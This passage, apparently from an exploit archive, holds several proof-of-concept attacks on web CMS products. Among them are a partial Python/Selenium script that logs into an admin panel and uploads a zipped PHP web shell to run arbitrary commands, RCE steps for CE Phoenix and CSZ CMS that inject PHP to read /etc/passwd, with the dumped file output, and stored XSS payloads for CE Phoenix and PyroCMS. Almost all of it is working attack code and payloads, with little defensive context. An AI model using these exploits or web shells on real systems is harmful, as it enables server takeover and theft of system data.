"32"<br /> elif os_name == "darwin":<br /> os_name = "macos"<br /> arch = "aarch64" if platform.processor() == "arm" else ""<br /> elif os_name == "windows":<br /> os_name = "win"<br /> arch = "64" if arch == "64bit" else "32"<br /> else:<br /> print("[!] Unsupported operating system.")<br /> sys.exit(1)<br /><br /> geckodriver_version = "v0.33.0"<br /> geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"<br /> ext = "zip" if os_name == "win" else "tar.gz"<br /> url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"<br /><br /> print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")<br /> response = requests.get(url, stream=True)<br /><br /> if response.status_code == 200:<br /> print("[*] Extracting GeckoDriver...")<br /> if ext == "tar.gz":<br /> with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:<br /> tar.extractall(path=directory)<br /> else: <br /> with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:<br /> zip_ref.extractall(directory)<br /> print("[+] GeckoDriver downloaded and extracted successfully.")<br /> else:<br /> print("[!] Failed to download GeckoDriver.")<br /> sys.exit(1)<br /> <br />def create_zip_file(php_filename, zip_filename, php_code):<br /> try:<br /> with open(php_filename, 'w') as file:<br /> file.write(php_code)<br /> with zipfile.ZipFile(zip_filename, 'w') as zipf:<br /> zipf.write(php_filename)<br /> print("[+] Zip file created successfully.")<br /> os.remove(php_filename)<br /> return zip_filename<br /> except Exception as e:<br /> print(f"[!] Error creating zip file: {e}")<br /> sys.exit(1)<br /><br /><br />def main(base_url, command):<br /><br /> if not base_url.endswith('/'):<br /> base_url += '/'<br /> <br /> zip_filename = None <br /><br /> check_geckodriver()<br /> try:<br /> firefox_options = FirefoxOptions()<br /> firefox_options.add_argument("--headless")<br /><br /> script_directory = os.path.dirname(os.path.abspath(__file__))<br /> geckodriver_path = os.path.join(script_directory, 'geckodriver')<br /> service = FirefoxService(executable_path=geckodriver_path)<br /> driver = webdriver.Firefox(service=service, options=firefox_options)<br /> print("[*] Exploit initiated.")<br /><br /> # Login<br /> driver.get(base_url + "admin/login")<br /> print("[*] Accessing login page...")<br /> driver.find_element(By.NAME, "email").send_keys(f"{email}")<br /> driver.find_element(By.NAME, "password").send_keys(f"{password}")<br /> driver.find_element(By.ID, "login_submit").click()<br /> print("[*] Credentials submitted...")<br /><br /> <br /> try:<br /> error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")<br /> if error_message.is_displayed():<br /> print("[!] Login failed: Invalid credentials.")<br /> driver.quit()<br /> sys.exit(1)<br /> except NoSuchElementException:<br /> print("[+] Login successful.")<br /><br /> # File creation <br /> print("[*] Preparing exploit files...")<br /> php_code = f"<?php echo system('{command}'); ?>"<br /> zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)<br /><br /> <br /> driver.get(base_url + "admin/upgrade")<br /> print("[*] Uploading exploit payload...")<br /> file_input = driver.find_element(By.ID, "file_upload")<br /> file_input.send_keys(os.path.join(os.getcwd(), zip_filename))<br /><br /> # Uploading<br /> driver.find_element(By.ID, "submit").click()<br /> WebDriverWait(driver, 10).until(EC.alert_is_present())<br /> alert = driver.switch_to.alert<br /> alert.accept()<br /><br /> # Exploit result <br /> exploit_url = base_url + "exploit.php"<br /> response = requests.get(exploit_url)<br /> print(f"[+] Exploit response:\n\n{response.text}")<br /><br /> except Exception as e:<br /> print(f"[!] Error: {e}")<br /> finally:<br /> driver.quit()<br /> if zip_filename and os.path.exists(zip_filename):<br /> os.remove(zip_filename)<br /><br />if __name__ == "__main__":<br /> entryy()<br /> if len(sys.argv) < 3:<br /> print("Usage: python script.py [BASE_URL] [COMMAND]")<br /> else:<br /> main(sys.argv[1], sys.argv[2])<br /></code></pre>
<pre><code>## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated)<br />#### Date: 2023-11-25<br />#### Exploit Author: tmrswrr<br />#### Category: Webapps<br />#### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/)<br />#### Version: v1.0.8.20<br />#### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix)<br /><br />### POC:<br /><br /><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"><br /><img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000"><br /><br /><br />1. **Login to admin panel:** <br /> - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english`<br /> <br />2. **Access english.php:**<br /> - Click on `english.php` and inject the payload: <br /> ```<br /> <?php echo system('cat /etc/passwd'); ?><br /> ```<br /> <br />3. **Save Changes:**<br /> - Save the modified file.<br /><br />4. **View Results:**<br /> - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/`<br /> - You will see the following result:<br /><br /><br />root:x:0:0:root:/root:/bin/bash<br />bin:x:1:1:bin:/bin:/sbin/nologin<br />daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />adm:x:3:4:adm:/var/adm:/sbin/nologin<br />lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin<br />sync:x:5:0:sync:/sbin:/bin/sync<br />shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown<br />halt:x:7:0:halt:/sbin:/sbin/halt<br />mail:x:8:12:mail:/var/spool/mail:/sbin/nologin<br />operator:x:11:0:operator:/root:/sbin/nologin<br />games:x:12:100:games:/usr/games:/sbin/nologin<br />ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin<br />nobody:x:99:99:Nobody:/:/sbin/nologin<br />systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin<br />systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin<br />dbus:x:81:81:System message bus:/:/sbin/nologin<br />polkitd:x:998:997:User for polkitd:/:/sbin/nologin<br />tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin<br />sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin<br />postfix:x:89:89::/var/spool/postfix:/sbin/nologin<br />chrony:x:997:995::/var/lib/chrony:/sbin/nologin<br />soft:x:1000:1000::/home/soft:/sbin/nologin<br />saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin<br />mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin<br />smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin<br />emps:x:995:1001::/home/emps:/bin/bash<br />named:x:25:25:Named:/var/named:/sbin/nologin<br />exim:x:93:93::/var/spool/exim:/sbin/nologin<br />vmail:x:5000:5000::/var/local/vmail:/bin/bash<br />mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false<br />webuzo:x:993:993::/home/webuzo:/bin/bash<br />apache:x:992:991::/home/apache:/sbin/nologin<br />apache:x:992:991::/home/apache:/sbin/nologin<br /><br /></code></pre>
<pre><code># Exploit Title: CE Phoenix Version 1.0.8.20 - Stored XSS<br /># Date: 2023-11-25<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://phoenixcart.org/<br /># Version: v3.0.1<br /># Tested on: https://www.softaculous.com/apps/ecommerce/CE_Phoenix<br /><br />## POC:<br /><br />1-Login admin panel , go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php<br />2-Click edit and write in Title field your payload : <sVg/onLy=1 onLoaD=confirm(1)//<br />3-Save it and go to this url : https://demos6.softaculous.com/CE_Phoenixx3r6jqi4kl/admin/currencies.php<br />4-You will be see alert button<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: PyroCMS v3.0.1 - Stored XSS<br /># Date: 2023-11-25<br /># Exploit Author: tmrswrr<br /># Category : Webapps<br /># Vendor Homepage: https://pyrocms.com/<br /># Version: v3.0.1<br /># Tested on: https://www.softaculous.com/apps/cms/PyroCMS<br /><br /><br /><br />----------------------------------------------------------------------------------------------------<br /><br /><br />1-Login admin panel , go to this url : https://127.0.0.1/public/admin/redirects/edit/1<br />2-Write in Redirect From field your payload : <sVg/onLy=1 onLoaD=confirm(1)//<br />3-Save it and go to this url : https://127.0.0.1/public/admin/redirects<br />4-You will be see alert button<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution<br /># Date: 23/11/2023<br /># Exploit Author: tmrswrr<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download<br /># Version: Version 1.3.0<br /># Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS<br /><br />1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade<br />2 ) System Upgrade Manually and upload this test.zip file :<br /><br /><?php echo system('cat /etc/passwd'); ?><br /><br />3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.php<br /><br />root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false<br /><br /><br /> <br /><br /><br /><br /><br /><br /><br /><br /><br /></code></pre>